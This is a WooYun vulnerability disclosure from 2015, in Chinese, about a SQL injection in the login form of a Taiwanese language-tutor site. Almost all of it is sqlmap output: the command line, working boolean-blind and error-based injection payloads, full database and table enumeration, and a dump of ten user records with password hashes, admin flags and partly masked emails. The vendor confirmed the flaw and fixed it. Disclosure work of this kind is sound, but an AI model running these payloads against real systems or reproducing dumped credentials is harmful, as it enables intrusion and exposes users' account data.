乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经确认,细节仅向厂商公开 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开
在我們的網站您可以找到所有英文老師,西班牙文老師,法文老師,德文老師,義大利文老師,日文老師,韓文老師,中文老師,台語老師甚至其他語言的外籍家教和外籍老師喔!
地址:http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2
$ python sqlmap.py -u "http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2" -p username --technique=BE --form --random-agent --batch -Dmyucomtw -T prod_user -C user_id,password,is_admin,hash,email --dump --start 1--stop 10
Database: myucomtw+-----------+---------+| Table | Entries |+-----------+---------+| prod_user | 10081 |+-----------+---------+
Database: myucomtwTable: prod_user[10 entries]+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+| user_id | password | is_admin | hash | email |+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+| 2 | $2a$10$eec4ce34b8b6a45374b23uWQ09GJ18lO0eLycjR9A7YKFCA1t.xIm | 1 | e06430fc1369df72ba1f43ddca517e08 | [email protected] || 6 | $2a$10$785851c266ce621696044uFF.hHWu.s8Ai/OacX/yjlj7IiMtpyeS | 1 | 8b338ef10e0456049979f1ddde454058 | at.macmillan@**.**.**.** || 24 | $2a$10$39bb96e33bff0400d76adezVYOdFgAh0gQtbgcV0R6kJklMFg/yfy | 0 | ffc06bad291e64eed00f76882e3d431f | michaelstor@**.**.**.** || 116 | $2a$10$9b7581221160eb51127baOQeAMdab/n.t42HtNZN1cROQOIVEnYou | 0 | 4816fe2eb93aa7ac54228ca4baf3b99f | jtwmountain@**.**.**.** || 162 | $2a$10$c07c950bd436559cd492bOK36nmV93ITRFh2VNZ1uZrKc/o.YmPN6 | 0 | 77c62e959e6dba6b0140ca14cdc9a510 | jimmychiu@**.**.**.** || 197 | $2a$10$a63e894f740db680d373cuHnPs0k9ThfAEfhQoVHAc0ery/O3R9H. | 0 | 8b05cf61013c60f87f302d79fe7da84b | anavlados@**.**.**.** || 236 | $2a$10$570ffb9b04f03b5be229fOeiqsagcIjnCttq/h7/GGU3WNr5U1bky | 0 | 4b6a871c9a21c1aa4e77f2a6b93bd3d4 | b.c.frattini@**.**.**.** || 256 | $2a$10$70179178278331426b3d5uvUB0jHvfYIg4/C2QyXj0jr5D5WKLRje | 0 | b298518de3c00e3c57cc16d1bdb3e253 | uwrobert@**.**.**.** || 275 | $2a$10$a1dd36ba819c0dc56aab1uZ.YH3MYvnWl7fdcJxAMdH42z8G7ag0K | 0 | a54e1c15d1f45061b81035f000202637 | henryyu@**.**.**.** || 281 | $2a$10$50d8c048c4609635d143auDJeTOpHky1Vbz4W3Eb.oQMw1tzlco8. | 0 | 8468af44c2d95b33f91fd2f9999a2a94 | victorbrown5800@**.**.**.** |+---------+--------------------------------------------------------------+----------+----------------------------------+----------------------------+
---Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz---web server operating system: FreeBSDweb application technology: PHP 5.5.15, Apache 2.4.10back-end DBMS: MySQL 5.0current user: '**.**.**.**@localhost'current user is DBA: Falsedatabase management system users [1]:[*] '**.**.**.**'@'localhost'Database: myucomtw+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| prod_userfrom | 32981 || prod_session | 20681 || prod_viewed_ad | 12802 || prod_teacher_feedback | 10502 || prod_user | 10081 || prod_teacher_shortlist | 9850 || prod_teacher_location | 8688 || prod_rss_teachers | 7730 || prod_student | 7553 || prod_points_purchase | 5638 || prod_teacher_deactivations | 5458 || prod_teacher_language | 3876 || prod_subscriptions_tracking | 2731 || prod_teacher | 2662 || prod_teacher_emails_to_invite | 1531 || prod_ad | 963 || test_session | 790 || prod_ips | 699 || prod_spam_bots | 400 || prod_districts | 370 || test_districts | 370 || test_userfrom | 224 || test_points_purchase | 219 || prod_failed_logins | 130 || prod_daily_word | 128 || prod_partner_stats | 63 || prod_partners | 51 || prod_business_card | 49 || test_teacher_location | 47 || test_teacher_language | 41 || test_rss_teachers | 31 || prod_pricelist | 30 || test_pricelist | 30 || prod_landing_pages | 24 || prod_forums_access | 19 || prod_country | 17 || test_country | 17 || test_partner_stats | 17 || prod_rss_items | 15 || test_rss_items | 15 || test_ad | 8 || test_teacher_feedback | 8 || prod_offsite_ads | 7 || test_daily_word | 6 || test_partners | 6 || prod_blacklisted_email | 5 || prod_subscriptions | 5 || test_viewed_ad | 5 || test_offsite_ads | 4 || test_teacher_shortlist | 4 || test_business_card | 2 || test_subscriptions | 2 || test_subscriptions_tracking | 2 || test_blacklisted_email | 1 || test_ips | 1 || test_landing_pages | 1 || test_student | 1 || test_teacher_emails_to_invite | 1 || test_user | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 2253 || STATISTICS | 501 || SESSION_VARIABLES | 444 || GLOBAL_VARIABLES | 430 || GLOBAL_STATUS | 341 || SESSION_STATUS | 341 || PARTITIONS | 252 || TABLES | 252 || KEY_COLUMN_USAGE | 233 || COLLATION_CHARACTER_SET_APPLICABILITY | 219 || COLLATIONS | 219 || TABLE_CONSTRAINTS | 190 || PLUGINS | 42 || CHARACTER_SETS | 40 || INNODB_FT_DEFAULT_STOPWORD | 36 || SCHEMA_PRIVILEGES | 32 || ENGINES | 9 || SCHEMATA | 3 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: myucomtw_forums+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| yphpads_adstats | 587104 || yphpads_userlog | 72232 || vb_phrase | 15653 || vb_post | 7619 || vb_thread | 7374 || vb_rsslog | 7295 || vb_cronlog | 7180 || vb_adminlog | 4015 || yphpads_targetstats | 2896 || vb_stats | 2586 || vb_threadviews | 2108 || vb_adminhelp | 1394 || vb_sigparsed | 682 || vb_template | 415 || vb_setting | 309 || vb_moderatorlog | 153 || vb_avatar | 108 || vb_phrasetype | 59 || vb_settinggroup | 40 || vb_editlog | 37 || vb_faq | 30 || vb_forumpermission | 27 || vb_datastore | 25 || yphpads_banners | 20 || yphpads_zones | 18 || vb_cron | 17 || vb_reputationlevel | 15 || yphpads_cache | 15 || yphpads_clients | 15 || vb_icon | 14 || vb_attachmenttype | 11 || vb_smilie | 11 || vb_usergroup | 11 || vb_pm | 10 || vb_paymentinfo | 9 || vb_announcementread | 8 || vb_session | 8 || vb_paymentapi | 7 || vb_subscriptionlog | 7 || vb_attachment | 6 || vb_mh_fl_forum_language | 6 || vb_forum | 5 || vb_pmtext | 5 || vb_postparsed | 5 || vb_announcement | 4 || vb_imagecategory | 4 || vb_infractionlevel | 4 || vb_externalcache | 3 || vb_style | 3 || vb_user | 3 || vb_userfield | 3 || vb_usertextfield | 3 || vb_usertitle | 3 || vb_administrator | 2 || vb_deletionlog | 2 || vb_language | 2 || vb_plugin | 2 || vb_pollvote | 2 || vb_productcode | 2 || vb_profilefield | 2 || vb_rssfeed | 2 || vb_adminutil | 1 || vb_calendar | 1 || vb_moderator | 1 || vb_passwordhistory | 1 || vb_paymenttransaction | 1 || vb_poll | 1 || vb_product | 1 || vb_regimage | 1 || vb_reputation | 1 || vb_strikes | 1 || vb_subscription | 1 || vb_usergroupleader | 1 || vb_usergrouprequest | 1 || yphpads_affiliates | 1 || yphpads_config | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: myucomtwTable: prod_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: myucomtwTable: test_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: myucomtw_forumsTable: yphpads_affiliates[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(64) |+----------+-------------+Database: myucomtw_forumsTable: vb_forum[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: myucomtw_forumsTable: vb_usergroup[2 columns]+-----------------+----------------------+| Column | Type |+-----------------+----------------------+| passwordexpires | smallint(5) unsigned || passwordhistory | smallint(5) unsigned |+-----------------+----------------------+Database: myucomtw_forumsTable: yphpads_clients[1 column]+----------------+-------------+| Column | Type |+----------------+-------------+| clientpassword | varchar(64) |+----------------+-------------+Database: myucomtw_forumsTable: vb_session[1 column]+--------+------------+| Column | Type |+--------+------------+| bypass | tinyint(4) |+--------+------------+Database: myucomtw_forumsTable: vb_user[2 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| password | varchar(32) || passworddate | date |+--------------+-------------+Database: myucomtw_forumsTable: vb_passwordhistory[2 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| password | varchar(50) || passworddate | date |+--------------+-------------+
---Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz---web server operating system: FreeBSDweb application technology: PHP 5.5.15, Apache 2.4.10back-end DBMS: MySQL 5.0Database: myucomtw+-----------+---------+| Table | Entries |+-----------+---------+| prod_user | 10081 |+-----------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz---web server operating system: FreeBSDweb application technology: PHP 5.5.15, Apache 2.4.10back-end DBMS: MySQL 5.0Database: myucomtwTable: prod_user[11 columns]+--------------------------+--------------+| Column | Type |+--------------------------+--------------+| banned | tinyint(1) || email | varchar(255) || hash | varchar(255) || is_admin | tinyint(1) || is_outside_admin | tinyint(1) || is_valid | tinyint(1) || last_login_date | datetime || password | varchar(255) || registered_date | datetime || sent_expire_warning_date | datetime || user_id | int(11) |+--------------------------+--------------+
上WAF。
危害等级:高
漏洞Rank:17
确认时间:2015-11-30 16:56
感謝通報
2016-01-07:已修復
